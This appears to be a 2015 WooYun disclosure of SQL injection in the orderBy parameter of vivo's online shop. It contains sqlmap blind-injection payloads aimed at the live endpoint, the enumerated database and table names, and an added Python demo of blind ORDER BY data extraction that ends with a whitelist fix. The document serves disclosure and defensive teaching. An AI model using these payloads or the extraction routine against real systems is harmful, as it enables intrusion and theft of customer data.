WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2015-07-29: Details sent to the vendor, awaiting vendor action
2015-08-02: Vendor confirmed; details visible to the vendor only
2015-08-12: Details opened to core white hats and domain experts
2015-08-22: Details opened to regular white hats
2015-09-01: Details opened to trainee white hats
2015-09-16: Details opened to the public
As titled.
http://shop.vivo.com.cn/gallery-ajax_get_goods.html
POST parameters: cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=
The orderBy parameter is injectable.
sqlmap identified the following injection points with a total of 522 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id=
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: MySQL 5.0
current user: '[email protected].%'
current database: 'vivo_store'
current user is DBA: True
available databases [8]:
[*] cacti
[*] information_schema
[*] mysql
[*] performance_schema
[*] seckill
[*] test
[*] vivo04e9
[*] vivo_chk

Database: vivo_store
[182 tables]
sdb_aftersales_return_product
sdb_apiactionlog_apilog
sdb_b2c_archive_orders
sdb_b2c_brand
sdb_b2c_cart
sdb_b2c_cart_objects
sdb_b2c_college
sdb_b2c_comment_goods_point
sdb_b2c_comment_goods_type
sdb_b2c_contract_package
sdb_b2c_contract_package_numbers
sdb_b2c_counter
sdb_b2c_counter_attach
sdb_b2c_coupon_map
sdb_b2c_coupon_vivo
sdb_b2c_coupon_vivo_info
sdb_b2c_coupon_vivo_list
sdb_b2c_coupon_vivo_xshot
sdb_b2c_coupons
sdb_b2c_delivery
sdb_b2c_delivery_items
sdb_b2c_dly_h_area
sdb_b2c_dlycorp
sdb_b2c_dlytype
sdb_b2c_flashlottery_award
sdb_b2c_flashlottery_log
sdb_b2c_flashlottery_winner
sdb_b2c_goods
sdb_b2c_goods_cat
sdb_b2c_goods_contract_package
sdb_b2c_goods_keywords
sdb_b2c_goods_lv_price
sdb_b2c_goods_promotion_ref
sdb_b2c_goods_question
sdb_b2c_goods_rate
sdb_b2c_goods_spec_index
sdb_b2c_goods_store_prompt
sdb_b2c_goods_type
sdb_b2c_goods_type_props
sdb_b2c_goods_type_props_value
sdb_b2c_goods_type_spec
sdb_b2c_goods_virtual_cat
sdb_b2c_lottery_award
sdb_b2c_lottery_log
sdb_b2c_lottery_winner
sdb_b2c_member_addrs
sdb_b2c_member_advance
sdb_b2c_member_college
sdb_b2c_member_comments
sdb_b2c_member_coupon
sdb_b2c_member_goods
sdb_b2c_member_limit_ip
sdb_b2c_member_lv
sdb_b2c_member_msg
sdb_b2c_member_point
sdb_b2c_member_pwdlog
sdb_b2c_member_secret
sdb_b2c_member_share_history
sdb_b2c_member_systmpl
sdb_b2c_members
sdb_b2c_order_coupon_user
sdb_b2c_order_delivery
sdb_b2c_order_items
sdb_b2c_order_log
sdb_b2c_order_objects
sdb_b2c_order_pmt
sdb_b2c_orders
sdb_b2c_preorders_sales_rule
sdb_b2c_products
sdb_b2c_reship
sdb_b2c_reship_items
sdb_b2c_sales_rule_goods
sdb_b2c_sales_rule_order
sdb_b2c_sell_logs
sdb_b2c_shop
sdb_b2c_spec_values
sdb_b2c_specification
sdb_b2c_type_brand
sdb_b2c_xfive_coupon_log
sdb_b2c_xfiveblue_preorder
sdb_b2c_xfivepro_preorder
sdb_base_app_content
sdb_base_apps
sdb_base_cache_expires
sdb_base_crontab
sdb_base_files
sdb_base_kvstore
sdb_base_network
sdb_base_queue
sdb_base_rpcnotify
sdb_base_rpcpoll
sdb_base_syscache_resources
sdb_content_article_bodys
sdb_content_article_indexs
sdb_content_article_nodes
sdb_couponlog_order_coupon_ref
sdb_couponlog_order_coupon_user
sdb_dbeav_meta_register
sdb_dbeav_meta_value_datetime
sdb_dbeav_meta_value_decimal
sdb_dbeav_meta_value_int
sdb_dbeav_meta_value_longtext
sdb_dbeav_meta_value_text
sdb_dbeav_meta_value_varchar
sdb_dbeav_recycle
sdb_desktop_filter
sdb_desktop_flow
sdb_desktop_hasrole
sdb_desktop_menus
sdb_desktop_recycle
sdb_desktop_role_flow
sdb_desktop_roles
sdb_desktop_tag
sdb_desktop_tag_rel
sdb_desktop_user_flow
sdb_desktop_users
sdb_ectools_analysis
sdb_ectools_analysis_logs
sdb_ectools_currency
sdb_ectools_order_bills
sdb_ectools_payments
sdb_ectools_payments_log_callback
sdb_ectools_payments_log_request
sdb_ectools_refunds
sdb_ectools_regions
sdb_express_dly_center
sdb_express_print_tmpl
sdb_gift_cat
sdb_gift_ref
sdb_image_image
sdb_image_image_attach
sdb_importexport_task
sdb_logisticstrack_logistic_log
sdb_operatorlog_logs
sdb_operatorlog_normallogs
sdb_operatorlog_register
sdb_pam_account
sdb_pam_auth
sdb_pam_bind_tag
sdb_pam_log
sdb_pointprofessional_member_point_task
sdb_preorderlog_order_preorder_user
sdb_site_activities_survey
sdb_site_activities_xfivepro
sdb_site_explorers
sdb_site_index_page
sdb_site_link
sdb_site_lucky_draw
sdb_site_menus
sdb_site_modules
sdb_site_purchase
sdb_site_route_statics
sdb_site_seo
sdb_site_themes
sdb_site_themes_file
sdb_site_themes_tmpl
sdb_site_widgets
sdb_site_widgets_instance
sdb_site_widgets_proinstance
sdb_system_matrixset
sdb_system_queue_mysql
sdb_timedbuy_objitems
sdb_upimage_upimage
sdb_wap_explorers
sdb_wap_menus
sdb_wap_modules
sdb_wap_seo
sdb_wap_themes
sdb_wap_themes_file
sdb_wap_themes_tmpl
sdb_wap_widgets
sdb_wap_widgets_instance
sdb_weixin_alert
sdb_weixin_bind
sdb_weixin_menus
sdb_weixin_message
sdb_weixin_message_image
sdb_weixin_message_text
sdb_weixin_safeguard
tmp_53aa3e378d690
tmp_53bbb6d760ad5
tmp_53bbc08212460
Filter the parameter.
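The report shows sqlmap confirming a blind injection in an ORDER BY position and recommends filtering the parameter. The example below is an added illustration, not code from the report or from the vivo shop: it models the vulnerable pattern (the orderBy value concatenated into the statement), shows how an attacker infers data from it one character at a time, and shows the fix that "filter the parameter" has to mean in an ORDER BY context, a server-side whitelist. It runs on sqlite3 so it works offline; the report's target was MySQL, where the same probes use SUBSTRING() and SLEEP(). The sqlmap vector in the report puts a multi-row subquery in the ELSE branch, which MySQL rejects with an error; the example uses the portable form of the same idea, flipping the sort direction. The tables goods and admin_users, their rows, the hash value and the ALLOWED_ORDER keys are all constructed for the demo.

```python
import sqlite3
import string

# Constructed schema and rows for the demo; not the vivo_store schema from the report.
SCHEMA = """
CREATE TABLE goods (goods_id INTEGER PRIMARY KEY, name TEXT, price REAL);
CREATE TABLE admin_users (uid INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
INSERT INTO goods VALUES (1, 'phone-a', 2498.0), (2, 'phone-b', 2998.0), (3, 'phone-c', 1498.0);
INSERT INTO admin_users VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""

# Hypothetical whitelist: the client sends a key, the server supplies the SQL fragment.
ALLOWED_ORDER = {
    "price_asc": "price ASC",
    "price_desc": "price DESC",
    "name": "name ASC",
    "newest": "goods_id DESC",
}


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_goods_vulnerable(conn, order_by):
    """Vulnerable pattern: orderBy is pasted into the statement. Bound parameters
    cannot fix this, because a placeholder carries a value, not an expression."""
    sql = "SELECT goods_id FROM goods ORDER BY " + order_by
    return [row[0] for row in conn.execute(sql)]


def list_goods_hardened(conn, order_by):
    """Fixed pattern: map the untrusted key to a server-side clause, reject anything else."""
    clause = ALLOWED_ORDER.get(order_by)
    if clause is None:
        raise ValueError("unsupported orderBy value")
    sql = "SELECT goods_id FROM goods ORDER BY " + clause
    return [row[0] for row in conn.execute(sql)]


def oracle(conn, condition):
    """One blind probe: a true condition sorts by goods_id ascending, a false one
    negates the key and sorts descending, so the first returned id answers the question."""
    payload = f"(CASE WHEN ({condition}) THEN goods_id ELSE -goods_id END)"
    return list_goods_vulnerable(conn, payload)[0] == 1


def extract(conn, expr, length, charset=string.digits + string.ascii_lowercase):
    """Recover a string-valued SQL expression one character at a time through the oracle.
    sqlite spells the function substr(); on MySQL it would be SUBSTRING()."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(conn, f"substr(({expr}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no character matched at position {pos}")
    return recovered


def demo():
    """Leak the constructed admin hash through the vulnerable endpoint, then show the
    hardened endpoint refusing the same kind of payload."""
    conn = connect()
    leaked = extract(conn, "SELECT pass_hash FROM admin_users WHERE uid = 1", 32)
    try:
        list_goods_hardened(conn, "(CASE WHEN (1=1) THEN goods_id ELSE -goods_id END)")
        blocked = False
    except ValueError:
        blocked = True
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("leaked via ORDER BY oracle:", leaked)
    print("hardened endpoint rejected payload:", blocked)
```

Escaping quotes does not help here: the injected text is an expression, not a string literal, so none of the probes above contain a quote that escaping would neutralise except the one the attacker chooses to put there. The only robust filter for an ORDER BY parameter is to accept a fixed set of keys and never let client input reach the SQL text.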
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-08-02 11:33
Thanks for your attention.
None yet.